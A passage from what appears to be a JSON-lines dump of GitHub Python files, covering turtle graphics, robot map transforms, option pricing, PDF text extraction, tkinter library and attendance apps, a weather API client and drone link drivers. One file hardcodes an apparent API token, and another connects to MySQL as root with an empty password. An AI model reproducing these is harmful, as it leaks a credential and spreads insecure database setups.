self.completed_goals.append(goal)\n","repo_name":"Oph123/Executioner","sub_path":"Executioner-main/agents/Ostkaka/utils/goal_tracking_custom.py","file_name":"goal_tracking_custom.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14830602455","text":"from turtle import fd, bk, lt, rt, pu, pd, speed\n\nspeed('fastest')\n\ndef kwadrat(bok):\n for i in range(4):\n fd(bok)\n rt(90)\n\ndef rozeta(N, a, b):\n for i in range(N):\n fd(b)\n kwadrat(a)\n bk(b)\n rt (360 / N)\n\ndef wzorek():\n for i in range(100):\n kwadrat(20 + i)\n rt(4)\n pu() # znika nam część kwadratów\n fd(12)\n pd() #również znika\n\n\nrozeta(36,20,50)\n","repo_name":"miloczek/Projekty-II-UWR","sub_path":"my python/wykłady python/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37345732986","text":"from scipy import signal\n\nimport numpy as np\nimport os\nimport rhctensor\nimport torch\nimport cache\n\n\ndef world2map(mapdata, poses, out=None):\n if out is None:\n print(\"out cannot be None\")\n exit(1)\n\n assert poses.size() == out.size()\n\n out[:, :] = poses\n scale = float(mapdata.resolution)\n\n # translation\n out[:, 0].sub_(mapdata.origin_x).mul_(1.0/scale)\n out[:, 1].sub_(mapdata.origin_y).mul_(1.0/scale)\n out[:, 2] += mapdata.angle\n\n xs = out[:, 0]\n ys = out[:, 1]\n\n # we need to store the x coordinates since they will be overwritten\n xs_p = xs.clone()\n\n out[:, 0] = xs * mapdata.angle_cos - ys * mapdata.angle_sin\n out[:, 1] = xs_p * mapdata.angle_sin + ys * mapdata.angle_cos\n\n\ndef world2mapnp(mapdata, poses):\n # translation\n poses[:, 0] -= mapdata.origin_x\n poses[:, 1] -= mapdata.origin_y\n\n # scale\n poses[:, :2] *= (1.0 / float(mapdata.resolution))\n\n # we need to store the x coordinates since they will be overwritten\n temp = np.copy(poses[:, 0])\n poses[:, 0] = mapdata.angle_cos * poses[:, 0] - mapdata.angle_sin * poses[:, 1]\n poses[:, 1] = mapdata.angle_sin * temp + mapdata.angle_cos * poses[:, 1]\n poses[:, 2] += mapdata.angle\n\n\ndef map2worldnp(mapdata, poses):\n # rotation\n # we need to store the x coordinates since they will be overwritten\n temp = np.copy(poses[:, 0])\n poses[:, 0] = mapdata.angle_cos * poses[:, 0] - mapdata.angle_sin * poses[:, 1]\n poses[:, 1] = mapdata.angle_sin * temp + mapdata.angle_cos * poses[:, 1]\n\n # scale\n poses[:, :2] *= float(mapdata.resolution)\n\n # translate\n poses[:, 0] += mapdata.origin_x\n poses[:, 1] += mapdata.origin_y\n poses[:, 2] += mapdata.angle\n\n\ndef load_permissible_region(params, map):\n \"\"\"\n get_map is a function that lazily gets all the mapdata\n * only use if map data is needed otherwise use cached data\n \"\"\"\n path = cache.get_cache_map_dir(params, map)\n perm_reg_file = os.path.join(path, \"perm_region.npy\")\n\n if os.path.isfile(perm_reg_file):\n pr = np.load(perm_reg_file)\n else:\n map_data = map.data()\n array_255 = map_data.reshape((map.height, map.width))\n pr = np.zeros_like(array_255, dtype=bool)\n\n # Numpy array of dimension (map_msg.info.height, map_msg.info.width),\n # With values 0: not permissible, 1: permissible\n pr[array_255 == 0] = 1\n pr = np.logical_not(pr) # 0 is permissible, 1 is not\n\n KERNEL_SIZE = 31 # 15 cm = 7 pixels = kernel size 15x15\n kernel = np.ones((KERNEL_SIZE, KERNEL_SIZE))\n kernel /= kernel.sum()\n pr = signal.convolve2d(pr, kernel, mode='same') > 0 # boolean 2d array\n np.save(perm_reg_file, pr)\n\n return torch.from_numpy(pr.astype(np.int)).type(rhctensor.byte_tensor())\n","repo_name":"romesco/correctiveFB_utils","sub_path":"ros_util/librhc/utils/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43195197342","text":"#/usr/bin/env python\nimport os\nimport sys\n\nimport unittest\nfrom confined import parse, templatize\n\n\nfeval = lambda rpn: templatize(dict(\n a=1,\n b=2,\n a_string = \"a beautiful world Isint ?\",\n\n ), \"<: %s :>\" % rpn \n)\n\nclass TestCheck_Arg(unittest.TestCase):\n\n def test_first(self):\n self.assertEqual(feval(\"2: 2: ADD\"), \"4.0\")\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=7)\n","repo_name":"jul/confined","sub_path":"confined/test_valid.py","file_name":"test_valid.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"3625671169","text":"# Reference:\n# <> Espen G. Haug\n#\n\n#import numpy as np\n#from .Distribution import cnd\nfrom math import log,exp,sqrt,pi\nfrom scipy.stats import norm\n\ndef HartAlgo(x):\n y=abs(x)\n k=exp(-y**2.0*0.5)\n if y>37.0:\n p=0.0\n elif y>=7.07106781186547:\n p=k/(y+1.0/(y+2.0/(y+3.0/(y+4.0/(y+0.65)))))/2.506628274631\n else:\n A=(((((0.0352624965998911*y+0.700383064443688)*y+6.37396220353165)*y+33.912866078383)*y+112.079291497871)*y+\n 221.213596169931)*y+220.206867912376\n B=((((((0.0883883476483184*y+1.75566716318264)*y+16.064177579207)*y+86.7807322029461)*y+296.564248779674)*y+\n 637.333633378831)*y+793.826512519948)*y+440.413735824752\n p=k*A/B\n if x>0.0:\n p=1.0-p\n return p\n\ndef PolyApprox4(x):\n '''\n the following approximation of N(x) produces values to within 4-decimal-place accuracy\n :param x:\n :return:\n '''\n y=abs(x)\n k=1.0/(1.0+0.33267*y)\n p=exp(-y**2.0*0.5)/sqrt(2.0*pi)*(0.4361836*k-0.1201676*k**2.0+0.9372980*k**3.0)\n if x>=0.0:\n return 1.0-p\n else:\n return p\n\ndef PolyApprox6(x):\n '''\n the following approximation of N(x), described by Abromowitz and Stegun(1974), produces values to within\n 6 decimal places of the true value.\n :param x:\n :return:\n '''\n y=abs(x)\n k=1.0/(1.0+0.2316419*y)\n p=exp(-y**2.0*0.5)/sqrt(2.0*pi)*\\\n (0.31938153*k-0.356563782*k**2.0+1.781477937*k**3.0-1.821255978*k**4.0+1.330274429*k**5.0)\n if x>=0.0:\n return 1.0-p\n else:\n return p\n\ndef cnd(x,method='default'): # cumulative normal distribution function\n '''\n , Chapter 13\n 注意:Python中norm.cdf()使用的似乎就是Hart算法\n '''\n if method=='default':\n return norm.cdf(x)\n elif method=='HartAlgo':\n return HartAlgo(x)\n elif method=='PolyApprox6':\n return PolyApprox6(x)\n else:\n return PolyApprox4(x)\n\n\ndef BSM(flag, S, K, r, T, sigma, q=0.0):\n '''\n European option, Black-Scholes(1973), allowing for a continuous dividend yield\n '''\n assert (T>0.0) & (sigma>0.0)\n d1=(log(S/K)+(r-q+sigma**2.0*0.5)*T)/sigma/sqrt(T)\n d2=d1-sigma*sqrt(T)\n if flag>0.0: # call\n return S*exp(-q*T)*cnd(d1)-K*exp(-r*T)*cnd(d2)\n else: # put\n return K*exp(-r*T)*cnd(-d2)-S*exp(-q*T)*cnd(-d1)\ndef GeneralizedBSM(flag, S, K, r, T, sigma, q=0.0):\n '''\n European option, BSM model be \"generalized\" by incorporating a cost-of-carry rate b;\n c=S*exp((b-r)T)*N(d1)-K*exp(-rT)*N(d2)\n p=K*exp(-rT)*N(-d2)-S*exp((b-r)T)*N(-d1)\n d1=(ln(S/K)+(b+sigma**2/2)T)/(sigma*sart(T))\n d2=d1-sigma*sqrt(T)\n ====================\n b=r gives the BS(1973) stock option model;\n b=r-q gives the Merton(1973) stock option model with continuous dividend yield q;\n b=0 gives the Black(1976) futures option model;\n b=0, r=0 gives the Asay(1982) margined futures option model;\n b=r-rf gives the Garman and Kohlhagen(1983) currency option model\n '''\n assert (T>0.0) & (sigma>0.0)\n b=r\n d1=(log(S/K)+(b+sigma**2.0/2.0)*T)/sigma/sqrt(T)\n d2=d1-sigma*sqrt(T)\n if flag>0.0: # call\n return S*exp((b-r)*T)*cnd(d1)-K*exp(-r*T)*cnd(d2)\n else: # put\n return K*exp(-r*T)*cnd(-d2)-S*exp((b-r)*T)*cnd(-d1)","repo_name":"Harbes/python","sub_path":"OptionMatrix/BSM.py","file_name":"BSM.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72794039092","text":"import numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--length\", \"-l\", type = int, help = \"Output length\", default = 100)\nparser.add_argument(\"--output\", \"-o\", type = str, help = \"Output file\", default = \"static_current.csv\")\nparser.add_argument(\"--value\", \"-v\", type = float, help = \"Value of I\", default = 1)\nargs = parser.parse_args()\n\n#Generate values for I\ncurrent = [args.value for _ in range(args.length)]\ncurrent = map(str, current)\n\n#Send values to file\nw = open(args.output, \"w\")\nw.write(\"\\n\".join(current))\nw.close()\n","repo_name":"jonmarty/Morris-Lecar","sub_path":"CreateStaticI.py","file_name":"CreateStaticI.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39584117047","text":"import os\nimport pdfplumber\n\nfrom pathlib import Path\n\n\ndef def_header_and_boxes(page):\n # print(page.extract_text())\n\n # ## bounding_box parameters ###\n #\n # x0: distance left border of page to left border of box\n # top: distance top of page to top of box\n # x1: distance left border of page to right border of box\n # bottom: distance top of page to bottom of box\n #\n # bounding_box: (x0, top, x1, bottom)\n # ##\n\n bounding_box_left = (0,\n 0.1 * float(page.height),\n 0.48 * float(page.width),\n page.height)\n\n bounding_box_right = (0.5 * float(page.width),\n 0.1 * float(page.height),\n page.width,\n page.height)\n\n bounding_box_header = (0,\n 0,\n page.width,\n 0.1 * float(page.height))\n\n return bounding_box_header, bounding_box_left, bounding_box_right\n\n\ndef get_text_w_pdfplumber(file_loc: str = None) -> str:\n # https://stackoverflow.com/a/4060259/6597765\n __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) # noqa\n path = Path(__location__)\n __location__ = path.parent.parent.absolute()\n\n # bgbl too difficult:\n # file_loc = os.path.join(__location__, \"PDFs/bgbl1_2021_75.pdf\") # noqa\n # file_loc = os.path.join(__location__, \"PDFs/percentages_float_and_high_numbers.pdf\") # noqa\n file_loc = os.path.join(__location__, \"PDFs/left_col_bottom_to_right_col_top.pdf\") # noqa\n\n pdf = pdfplumber.open(file_loc)\n\n inp = input(\"All pages? y/N - if no, only first page will be extracted\")\n if inp == \"y\":\n text = ''\n for page in pdf.pages:\n header_bbox, left_bbox, right_bbox = def_header_and_boxes(page)\n\n header = page.crop(header_bbox)\n header_text = header.extract_text()\n if header_text:\n header_text = \"\\n\\nheader:\\n\" + header_text\n else:\n header_text = \"\\nheader:\\n\"\n\n left_box = page.crop(left_bbox)\n left_box_text = left_box.extract_text()\n if left_box_text:\n left_box_text = \"\\nleft_box:\\n\" + left_box_text\n else:\n left_box_text = \"\\nleft_box:\\n\"\n\n right_box = page.crop(right_bbox)\n right_box_text = right_box.extract_text()\n if right_box_text:\n right_box_text = \"\\nright_box:\\n\" + right_box_text\n else:\n right_box_text = \"\\nright_box:\\n\"\n\n for text_el in [header_text, left_box_text, right_box_text]:\n if text_el:\n text = text + text_el\n else:\n text = ''\n page = pdf.pages[0]\n header, left_box, right_box = def_header_and_boxes(page)\n\n header_text = header.extract_text()\n left_box_text = left_box.extract_text()\n right_box_text = right_box.extract_text()\n text = text + header_text + left_box_text + right_box_text\n\n pdf.close()\n\n return text\n\n\nif __name__ == \"__main__\":\n from contextlib import redirect_stdout\n\n text = get_text_w_pdfplumber()\n print(text)\n with open(\"result.txt\", \"w\") as fout:\n with redirect_stdout(fout):\n print(text)\n\n# header, left_col, right_col = get_text_w_pdfplumber()\n# print(header)\n# print()\n# print(left_col)\n# print()\n# print(right_col)\n","repo_name":"0LL13/PDF_is_evil","sub_path":"pdfplumber/pdfplumber/PDF2text_pdfplumber.py","file_name":"PDF2text_pdfplumber.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36518063114","text":"from ast import Delete, excepthandler\r\nfrom cProfile import label\r\nfrom email.mime import image\r\nfrom logging import root\r\nfrom re import L\r\nfrom tkinter import * \r\nfrom subprocess import call #pour importer la bibliotheque tkinter\r\nfrom tkinter import ttk, messagebox\r\nfrom turtle import bgcolor, title #permetre de gerer les selcetions et les message derrueeur afficher ou de securite\r\n#from tkcalendar import *\r\nimport pymysql \r\n \r\n\r\nclass ajoutlivres: # classe formulaire:\r\n def __init__(self,root): \r\n self.PageAjouterDesLivres = root\r\n self.PageAjouterDesLivres.title(\"Ajouter un livre\") #titre Ajouter un livre\r\n self.PageAjouterDesLivres.geometry(\"1040x560+400+200\") #taille de l'application\r\n self.PageAjouterDesLivres.resizable(width=False, height=False)# eviter d'agrandir la fenetre\r\n self.PageAjouterDesLivres.iconbitmap()#importer l'icone \r\n\r\n\r\n #on déclare des variables pour ensuite les récuperer\r\n self.TitreLivre = StringVar()\r\n self.Auteurs = StringVar()\r\n self.Editeurs = StringVar()\r\n self.Collections = StringVar()\r\n self.Etat = StringVar()\r\n\r\n \r\n \r\n\r\n\r\n #panneau vert gestion livres\r\n self.Paneauvertdegestionlivres = Frame(self.PageAjouterDesLivres, bg=\"#bedb0d\")\r\n self.Paneauvertdegestionlivres.place(x=190, y=0, width=1100, height=1000)\r\n\r\n #panneau orange\r\n Paneauorangedegestionlivres = Frame(self.PageAjouterDesLivres, bg=\"#ff7f00\")\r\n Paneauorangedegestionlivres.place(x=0, y=0, width=190, height=1000)\r\n\r\n self.imageicon2 = PhotoImage()\r\n self.btn = Button(self.PageAjouterDesLivres,command=self.VersGestionlivres, text=\"\",compound=LEFT,image=self.imageicon2, width=184,height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn.place(x=0 , y=0) \r\n \r\n self.imageicon3 = PhotoImage()\r\n self.btn1 = Button(self.PageAjouterDesLivres,command=self.VersAdherents ,text=\"\",compound=LEFT,image=self.imageicon3, width=184, height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn1.place(x=0 , y=140) \r\n\r\n self.imageicon4 = PhotoImage()\r\n self.btn2 = Button(self.PageAjouterDesLivres,command=self.VersGestiondesprets, text=\"\",compound=LEFT,image=self.imageicon4, width=184, height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn2.place(x=0 , y=280) \r\n\r\n self.imageicon5 = PhotoImage()\r\n self.btn3 = Button(self.PageAjouterDesLivres, text=\"\",command=self.PourSedeconnecter,compound=LEFT,image=self.imageicon5, width=184, height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn3.place(x=0 , y=420)\r\n\r\n labelgestionlivres = Label(self.PageAjouterDesLivres, text=\" Gestion Livres \",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labelgestionlivres.place(x=0, y=100,width=190)\r\n\r\n labeladherents = Label(self.PageAjouterDesLivres, text=\" Adhérents \",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labeladherents.place(x=0, y=240,width=190)\r\n\r\n labelgestionprets = Label(self.PageAjouterDesLivres, text=\" Gestion Prêts\",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labelgestionprets.place(x=0, y=380,width=190)\r\n\r\n labelsedeconnecter = Label(self.PageAjouterDesLivres, text=\" Se déconnecter\",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labelsedeconnecter.place(x=0, y=520,width=190) \r\n\r\n labelgestionlivretitre = Label(self.PageAjouterDesLivres, text=\" Ajouter un livre \",font =(\"algarian\", 20,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelgestionlivretitre.place(x=350, y=20,width=500)\r\n\r\n #label = les titres \r\n\r\n labeltitres = Label(self.PageAjouterDesLivres, text=\" Titre \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labeltitres.place(x=300, y=150,width=100)\r\n\r\n labelauteurs = Label(self.PageAjouterDesLivres, text=\" Auteur \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelauteurs.place(x=310, y=200,width=100)\r\n\r\n labelcollections = Label(self.PageAjouterDesLivres, text=\" Collection \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelcollections.place(x=323, y=240,width=100)\r\n\r\n labelediteurs = Label(self.PageAjouterDesLivres, text=\" Editeur \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelediteurs.place(x=312, y=280,width=100)\r\n \r\n \r\n \r\n \r\n #ENTRY = Champs de saisie\r\n\r\n TitreLivre= Entry(self.PageAjouterDesLivres,textvariable=self.TitreLivre, font= (5), bg=\"white\")\r\n TitreLivre.place(x=500, y=150,width=150)\r\n\r\n Auteurs= Entry(self.PageAjouterDesLivres, textvariable=self.Auteurs,font= (5), bg=\"white\")\r\n Auteurs.place(x=500, y=200,width=150)\r\n\r\n Collections= Entry(self.PageAjouterDesLivres,textvariable=self.Collections, font= (5), bg=\"white\")\r\n Collections.place(x=500, y=240,width=150)\r\n\r\n Editeurs= Entry(self.PageAjouterDesLivres,textvariable=self.Editeurs, font= (5), bg=\"white\")\r\n Editeurs.place(x=500, y=280,width=150)\r\n\r\n \r\n \r\n # bouton\r\n BoutonAjouterUnlivre = Button(self.PageAjouterDesLivres,command=self.ClickAjouterUnLivre, text=\"Ajouter\",cursor=\"hand2\", font=(\"times new roman\",11), bd=0,bg=\"white\",fg=\"black\")\r\n BoutonAjouterUnlivre.place(x=700, y=400)\r\n\r\n\r\n def VersAdherents(self):\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Adherents.py\"])\r\n\r\n def VersGestiondesprets(self):\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Gestiondesprets.py\"])\r\n \r\n def VersGestionlivres(self):\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Gestionlivres.py\"])\r\n \r\n def PourSedeconnecter(self):\r\n lemessagebox = messagebox.askyesno(\"Déconnexion\",\"Voulez-vous vous déconnecter\", parent=self.PageAjouterDesLivres)\r\n if lemessagebox == YES:\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Connexion.py\"])\r\n\r\n \r\n def ClickAjouterUnLivre(self):\r\n if self.TitreLivre.get()==\"\" or self.Auteurs.get()==\"\" or self.Editeurs.get()==\"\" or self.Collections.get()==\"\" or self.Etat.get()==\"\":\r\n messagebox.showerror(\"Erreur\", \"Veuillez remplir tout les champs\", parent=self.PageAjouterDesLivres) #si tout les champs ne sont pas rempli alors affiche un message box pour dire que les champs ne sont pas rempli \r\n \r\n try:\r\n con= pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"bibyaso\")\r\n cur=con.cursor()\r\n cur.execute(\"select * from ajouterdeslivres where TitreLivre=%s\",self.TitreLivre.get())\r\n row= cur.fetchone()\r\n\r\n if row!= None:\r\n messagebox.showerror(\"Erreur\", \"Ce livre existe deja\", parent=self.PageAjouterDesLivres)\r\n else:\r\n cur.execute(\"insert into ajouterdeslivres (TitreLivre, Auteurs, Collections, Editeurs,Etat) values (%s,%s,%s,%s,%s)\",\r\n (\r\n \r\n self.TitreLivre.get(),\r\n self.Auteurs.get(),\r\n self.Editeurs.get(),\r\n self.Collections.get(),\r\n self.Etat.get()\r\n \r\n ))\r\n\r\n messagebox.showinfo(\"Succes\",\"Votre livre à été gérée\", parent=self.PageAjouterDesLivres)\r\n \r\n con.commit()\r\n con.close\r\n except Exception as es :\r\n messagebox.showerror(\"erreur\",f\"Erreur de connexion{str(es)}\",parent=self.PageAjouterDesLivres)\r\n \r\n \r\n\r\n \r\n\r\nroot =Tk()\r\nobj = ajoutlivres(root)\r\nroot.mainloop()","repo_name":"yassineaitalla/bib","sub_path":"GestionDeLivresDansUneBibliotheque/GestionDeLivresDansUneBibliotheque/Ajouterdeslivres.py","file_name":"Ajouterdeslivres.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12262354720","text":"from app import app\nimport requests\n\n\ndef consultar_tempo(cidade_id):\n TOKEN = \"b22460a8b91ac5f1d48f5b7029891b53\"\n url = f\"http://apiadvisor.climatempo.com.br/api/v1/forecast/locale/{cidade_id}/days/15?token={TOKEN}\"\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['data']\n else:\n return None\n","repo_name":"bsgabrielsilva/testea","sub_path":"app/services/consultar_tempo.py","file_name":"consultar_tempo.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34196482737","text":"import logging\nimport os\n\nfrom .exceptions import WrongUriType\nfrom .prrtdriver import PrrtDriver\nfrom .radiodriver import RadioDriver\nfrom .serialdriver import SerialDriver\nfrom .tcpdriver import TcpDriver\nfrom .udpdriver import UdpDriver\nfrom .usbdriver import UsbDriver\n\n__author__ = 'Bitcraze AB'\n__all__ = []\n\nlogger = logging.getLogger(__name__)\n\n\nCLASSES = []\n\n\ndef init_drivers(enable_debug_driver=False, enable_serial_driver=False):\n \"\"\"Initialize all the drivers.\"\"\"\n\n env = os.getenv('USE_CFLINK')\n if env is not None and env == 'cpp':\n from .cflinkcppdriver import CfLinkCppDriver\n CLASSES.append(CfLinkCppDriver)\n else:\n CLASSES.extend([RadioDriver, UsbDriver])\n\n if enable_debug_driver:\n logger.warn('The debug driver is no longer supported!')\n\n if enable_serial_driver:\n CLASSES.append(SerialDriver)\n\n CLASSES.extend([UdpDriver, PrrtDriver, TcpDriver])\n\n\ndef scan_interfaces(address=None):\n \"\"\" Scan all the interfaces for available Crazyflies \"\"\"\n available = []\n found = []\n for driverClass in CLASSES:\n try:\n logger.debug('Scanning: %s', driverClass)\n instance = driverClass()\n found = instance.scan_interface(address)\n available += found\n except Exception:\n raise\n return available\n\n\ndef get_interfaces_status():\n \"\"\"Get the status of all the interfaces\"\"\"\n status = {}\n for driverClass in CLASSES:\n try:\n instance = driverClass()\n status[instance.get_name()] = instance.get_status()\n except Exception:\n raise\n return status\n\n\ndef get_link_driver(uri, link_quality_callback=None, link_error_callback=None):\n \"\"\"Return the link driver for the given URI. Returns None if no driver\n was found for the URI or the URI was not well formatted for the matching\n driver.\"\"\"\n for driverClass in CLASSES:\n try:\n instance = driverClass()\n instance.connect(uri, link_quality_callback, link_error_callback)\n return instance\n except WrongUriType:\n continue\n\n return None\n","repo_name":"bitcraze/crazyflie-lib-python","sub_path":"cflib/crtp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"21"} +{"seq_id":"24070534740","text":"\"\"\"\ndb.py - Database Access\n\"\"\"\nimport os\nfrom pymongo import MongoClient\nimport settings # NOQA\n\n\nclass Database():\n \"\"\"\n Class for connecting to our database\n \"\"\"\n conn = None\n database = os.getenv('DATABASE_NAME', 'falcon')\n\n def __init__(self, fail_silent: bool = True) -> None:\n db_url = os.getenv('DB_URL', 'mongodb://localhost:27017')\n if not Database.conn:\n Database.conn = MongoClient(db_url)\n print(\"Connected to database at {}\".format(db_url))\n self.fail_silent = fail_silent\n \n def insert_one_result(self, inserted_id: str = None) -> dict:\n \"\"\"\n Return for a fail-silent Insert operation\n \"\"\"\n return {\n 'acknowledged': False,\n 'inserted_id': inserted_id,\n 'already_exists': True\n }\n\n def update_one_result(self) -> dict:\n \"\"\"\n Return for a fail-silent Update operation\n \"\"\"\n return {\n 'acknowledged': False,\n 'matched_count': 0,\n 'modified_count': 0,\n 'upserted_id': None,\n 'raw_result': None\n }\n","repo_name":"tjdaley/falconapi","sub_path":"database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26119405352","text":"import pygame\n\nclass Thief():\n\n def __init__(self,ai_settings,screen):\n self.screen=screen\n self.ai_settings=ai_settings\n self.small_scale=0.2\n self.image1 = pygame.image.load('Interface_pics/Interface_pics/thief1.png')\n self.image1 = pygame.transform.scale(self.image1, (int(self.image1.get_width() * self.small_scale), int(self.image1.get_height() * self.small_scale))).convert_alpha()\n self.rect1 = self.image1.get_rect()\n self.image2 = pygame.image.load('Interface_pics/Interface_pics/thief2.png')\n self.image2 = pygame.transform.scale(self.image2, (int(self.image2.get_width() * self.small_scale), int(self.image2.get_height() * self.small_scale))).convert_alpha()\n self.rect2 = self.image2.get_rect()\n self.image = pygame.image.load('Interface_pics/Interface_pics/thief1.png')\n self.image = pygame.transform.scale(self.image, (int(self.image.get_width() * self.small_scale), int(self.image.get_height() * self.small_scale))).convert_alpha()\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = self.screen_rect.centerx-75\n self.rect.bottom = self.screen_rect.bottom-5\n\n self.center = float(self.rect1.centerx)\n\n self.moving = True\n\n def update(self):\n if self.image == self.image1:\n self.image = self.image2\n else:\n self.image = self.image1\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)","repo_name":"Jiarui-Xu-Gatech/No-thief-under-Heaven","sub_path":"Thief.py","file_name":"Thief.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26006188713","text":"import tkinter as tk\r\nfrom tkinter.constants import LEFT\r\nimport tkinter.font as tkFont\r\nfrom tkinter import messagebox\r\nfrom tkinter.messagebox import askokcancel, showinfo, WARNING\r\nfrom Recognition import recognize_attendence\r\nfrom DB_MarkAttendance import mark_attendance\r\nfrom datetime import date\r\nfrom DB_DownloadAttendance import download_daily_attendance\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter_custom_button import hover\r\n\r\nattendance_list = []\r\ndef main(root, table_name,class_name, subject_name, username):\r\n \r\n root.title(\"Conduct Attendance\")\r\n \r\n width=741\r\n height=509\r\n screenwidth = root.winfo_screenwidth()\r\n screenheight = root.winfo_screenheight()\r\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\r\n root.geometry(alignstr)\r\n root.resizable(width=False, height=False)\r\n\r\n image1 = Image.open(\"Dataset/BG2.png\")\r\n image1 = image1.resize((735,500),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n BGLabel=tk.Label(root,image=test)\r\n BGLabel.image=test\r\n #BGLabel[\"bg\"] = \"#393d49\"\r\n ft = tkFont.Font(family='Times',size=10)\r\n BGLabel[\"font\"] = ft\r\n BGLabel[\"justify\"] = \"center\"\r\n BGLabel[\"text\"] = \"\"\r\n BGLabel.place(x=3,y=0,width=735,height=506)\r\n\r\n Back=tk.Button(root)\r\n Back[\"bg\"] = \"#f0f0f0\"\r\n Back[\"borderwidth\"] = \"3px\"\r\n ft = tkFont.Font(family='Times',size=13)\r\n Back[\"font\"] = ft\r\n Back[\"fg\"] = \"#000000\"\r\n Back[\"justify\"] = \"center\"\r\n Back[\"text\"] = \"Back\"\r\n Back.place(x=10,y=10,width=150,height=45)\r\n Back[\"command\"] = lambda : Back_command(root, table_name,class_name, subject_name, username)\r\n hover(Back,\"#f0f0f0\")\r\n\r\n Logout=tk.Button(root)\r\n Logout[\"bg\"] = \"#f0f0f0\"\r\n Logout[\"borderwidth\"] = \"3px\"\r\n ft = tkFont.Font(family='Times',size=13)\r\n Logout[\"font\"] = ft\r\n Logout[\"fg\"] = \"#000000\"\r\n Logout[\"justify\"] = \"center\"\r\n Logout[\"text\"] = \"Logout\"\r\n Logout.place(x=580,y=10,width=150,height=45)\r\n Logout[\"command\"] = lambda : Logout_command(root)\r\n hover(Logout,\"#f0f0f0\")\r\n\r\n Divider=tk.Label(root)\r\n Divider[\"bg\"] = \"#90ee90\"\r\n ft = tkFont.Font(family='Times',size=10)\r\n Divider[\"font\"] = ft\r\n Divider[\"fg\"] = \"#333333\"\r\n Divider[\"justify\"] = \"center\"\r\n Divider[\"text\"] = \"\"\r\n Divider.place(x=0,y=170,width=741,height=3)\r\n\r\n Title=tk.Label(root)\r\n Title[\"bg\"] = \"#393d49\"\r\n ft = tkFont.Font(family='Times',size=32)\r\n Title[\"font\"] = ft\r\n Title[\"fg\"] = \"#ffffff\"\r\n Title[\"justify\"] = \"center\"\r\n Title[\"text\"] = \"Attendance Panel\"\r\n Title.place(x=0,y=75,width=741,height=75)\r\n\r\n image1 = Image.open(\"Dataset/start.png\")\r\n image1 = image1.resize((150,150),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n Start=tk.Button(root, image = test, compound=LEFT)\r\n Start.image=test\r\n Start[\"bg\"] = \"#22ee33\"\r\n Start[\"borderwidth\"] = \"5px\"\r\n ft = tkFont.Font(family='Times',size=18)\r\n Start[\"font\"] = ft\r\n Start[\"fg\"] = \"#000000\"\r\n Start[\"justify\"] = \"center\"\r\n Start[\"text\"] = \"Start\\nAttendance\"\r\n Start.place(x=50,y=200,width=300,height=150)\r\n Start[\"command\"] = lambda : attendance()\r\n hover(Start,\"#22ee33\")\r\n\r\n image1 = 